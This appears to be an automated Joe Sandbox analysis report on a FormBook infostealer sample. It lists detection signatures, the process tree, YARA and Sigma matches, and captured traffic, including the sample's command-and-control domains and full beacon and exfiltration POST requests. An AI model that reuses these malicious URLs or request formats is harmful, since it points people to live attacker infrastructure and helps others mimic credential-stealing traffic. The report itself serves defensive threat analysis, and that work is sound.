Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IBbGrGi4A7.exe

Overview

General Information

Sample name:IBbGrGi4A7.exe
renamed because original name is a hash value
Original sample name:9bd2e65b401b992b241c29fc198f6b1bb3e8b2d75d6b3a1669bd5017e51c7c26.exe
Analysis ID:1634593
MD5:f9cba39579a665bb04f9d3eb0870cba1
SHA1:faf02ae8271b30cf1a41b625efe4262ba103f9c8
SHA256:9bd2e65b401b992b241c29fc198f6b1bb3e8b2d75d6b3a1669bd5017e51c7c26
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • IBbGrGi4A7.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\IBbGrGi4A7.exe" MD5: F9CBA39579A665BB04F9D3EB0870CBA1)
    • svchost.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\IBbGrGi4A7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • L0o39BrLvRQHRGJJTVHX4K.exe (PID: 5712 cmdline: "C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\7MqrhSJQHs.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • takeown.exe (PID: 5468 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • L0o39BrLvRQHRGJJTVHX4K.exe (PID: 5580 cmdline: "C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\2W5uMBiP1My.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 6020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ParentImage: C:\Users\user\Desktop\IBbGrGi4A7.exe, ParentProcessId: 6924, ParentProcessName: IBbGrGi4A7.exe, ProcessCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ProcessId: 7104, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ParentImage: C:\Users\user\Desktop\IBbGrGi4A7.exe, ParentProcessId: 6924, ParentProcessName: IBbGrGi4A7.exe, ProcessCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ProcessId: 7104, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: IBbGrGi4A7.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.nan21.net/qgyh/?LbXlyPpp=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DXhhfyTehnr5bskVH0czEjLoaQIeNBdlHr4z+9MzW+HgKHgH/9TjKbe&kV=9tSDAbLP667xAvira URL Cloud: Label: malware
                Source: http://www.multo.xyz/7pb3/Avira URL Cloud: Label: malware
                Source: http://www.nan21.net/qgyh/Avira URL Cloud: Label: malware
                Source: http://www.multo.xyz/7pb3/?kV=9tSDAbLP667x&LbXlyPpp=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liOLlrHSxOnkcsQMl+oK38ZsgNCmZo1D3bCrfweDL3zmilAYdarfI3ZcAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: IBbGrGi4A7.exeReversingLabs: Detection: 68%
                Source: IBbGrGi4A7.exeVirustotal: Detection: 73%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: IBbGrGi4A7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329449489.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330485725.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037445A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037C6D1 FindFirstFileW,FindClose,0_2_0037C6D1
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C75C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037EF95
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F0F2
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F3F3
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003737EF
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B12
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BCBC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0258C380 FindFirstFileW,FindNextFileW,FindClose,3_2_0258C380
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then xor eax, eax3_2_02579DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then mov ebx, 00000004h3_2_02DC04F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.sislieskort.xyz
                Source: DNS query: www.dolfisstillspinnin.xyz
                Source: DNS query: www.multo.xyz
                Source: Joe Sandbox ViewIP Address: 3.125.36.175 3.125.36.175
                Source: Joe Sandbox ViewIP Address: 3.125.36.175 3.125.36.175
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003822EE
                Source: global trafficHTTP traffic detected: GET /glm7/?LbXlyPpp=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/pleOey0sc8S0ib7OOh7z7fGv7sMnhuGQuR1OqqP/gFu6SjBFzp/nPU1r&kV=9tSDAbLP667x HTTP/1.1Host: www.sislieskort.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qgyh/?LbXlyPpp=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DXhhfyTehnr5bskVH0czEjLoaQIeNBdlHr4z+9MzW+HgKHgH/9TjKbe&kV=9tSDAbLP667x HTTP/1.1Host: www.nan21.netAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a669/?kV=9tSDAbLP667x&LbXlyPpp=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9rlITGUcf3IDt8IN8iuUtzhkIqtflv5uvSpmjHt/ELf0cmfR80FVkQrxF HTTP/1.1Host: www.rbopisalive.cyouAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z4h6/?LbXlyPpp=oPD5yFZP7wctr4H+UTXo8U1sQMLypPPPi/lke/3f4LEIiJw/NGa43dXYK61sC1fT5ul8W7mIEEjnBlsOqjdznugcKQdiSd/wXofryMQWvD5YoPjAEedRmMDhWexrbX1Mw92hr2mQUP2y&kV=9tSDAbLP667x HTTP/1.1Host: www.dolfisstillspinnin.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7pb3/?kV=9tSDAbLP667x&LbXlyPpp=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liOLlrHSxOnkcsQMl+oK38ZsgNCmZo1D3bCrfweDL3zmilAYdarfI3Zc HTTP/1.1Host: www.multo.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6sso/?LbXlyPpp=5FYyPsJYL9mEwCZYVUnKPFrY8+hnQKVbJI6dHZrolSWgUyhhuZcUC37k5jyocUOOYHYjhpJnfRuNQT4n0jS+7YRDnIft8iMUEvGwfVjhhqn2us8yCCnuzBi/MN+sqdUphmSVyeeEJlEm&kV=9tSDAbLP667x HTTP/1.1Host: www.zenilow.siteAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /37iq/?kV=9tSDAbLP667x&LbXlyPpp=W4F2zohB5pQ72r97CGdqxaJtVP2Tx0vwqEbNWqUJsjhZovGOMKQzdy5mphqfsmmmu4a+Cp8WVxz5WDDoq4ZXIJFY8IQdAPpDun87GDn75NZxeCSKPVWYskYW1N4aqYZjQGTWdEFlHIyP HTTP/1.1Host: www.kakeksakti43.cfdAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.sislieskort.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nan21.net
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global trafficDNS traffic detected: DNS query: www.dolfisstillspinnin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.multo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.zenilow.site
                Source: global trafficDNS traffic detected: DNS query: www.kakeksakti43.cfd
                Source: global trafficDNS traffic detected: DNS query: www.kakeksakti12.cfd
                Source: unknownHTTP traffic detected: POST /qgyh/ HTTP/1.1Host: www.nan21.netAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.nan21.netCache-Control: max-age=0Content-Length: 221Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.nan21.net/qgyh/User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36Data Raw: 4c 62 58 6c 79 50 70 70 3d 41 30 76 47 74 77 2f 57 6b 57 37 4f 58 74 79 38 63 62 2f 47 61 56 51 6a 6a 63 35 54 6f 69 43 49 4a 77 63 7a 44 4e 4c 6c 49 62 4e 4b 66 41 49 4c 68 6b 4c 30 43 76 65 54 68 74 5a 71 6f 43 56 65 74 4f 39 4f 54 5a 59 49 66 61 4b 78 56 54 2f 53 54 68 64 49 75 47 44 33 72 64 37 49 42 54 66 50 77 62 6f 52 42 58 4d 50 2f 58 4b 31 71 36 70 51 5a 59 4d 72 6d 79 33 6c 34 39 74 38 32 32 6d 45 75 5a 43 57 61 4a 77 65 6a 59 43 45 2b 63 59 46 52 4d 72 59 4b 68 52 52 78 39 47 7a 6a 50 59 63 44 65 5a 6c 52 36 49 5a 44 31 78 71 4a 5a 51 55 44 54 57 39 71 72 38 4a 61 63 67 4e 6d 57 6a 6e 71 52 67 61 4c 64 4d 34 2b 6f 43 70 69 66 6c 5a 4b 41 3d 3d Data Ascii: LbXlyPpp=A0vGtw/WkW7OXty8cb/GaVQjjc5ToiCIJwczDNLlIbNKfAILhkL0CveThtZqoCVetO9OTZYIfaKxVT/SThdIuGD3rd7IBTfPwboRBXMP/XK1q6pQZYMrmy3l49t822mEuZCWaJwejYCE+cYFRMrYKhRRx9GzjPYcDeZlR6IZD1xqJZQUDTW9qr8JacgNmWjnqRgaLdM4+oCpiflZKA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:02:58 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BKVSNZKA79C1Z2P9W380DContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4b 56 53 4e 5a 4b 41 37 39 43 31 5a 32 50 39 57 33 38 30 44 Data Ascii: Not Found - Request ID: 01JP1BKVSNZKA79C1Z2P9W380D
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:03:01 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BKY8VXKZXSF9ANGMN5YPZContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4b 59 38 56 58 4b 5a 58 53 46 39 41 4e 47 4d 4e 35 59 50 5a Data Ascii: Not Found - Request ID: 01JP1BKY8VXKZXSF9ANGMN5YPZ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:03:03 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BM0RNVTGHC33S54MDYZ82Content-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4d 30 52 4e 56 54 47 48 43 33 33 53 35 34 4d 44 59 5a 38 32 Data Ascii: Not Found - Request ID: 01JP1BM0RNVTGHC33S54MDYZ82
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:03:06 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BM38C4863H7RA6YRCTF3MContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4d 33 38 43 34 38 36 33 48 37 52 41 36 59 52 43 54 46 33 4d Data Ascii: Not Found - Request ID: 01JP1BM38C4863H7RA6YRCTF3M
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:24 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> 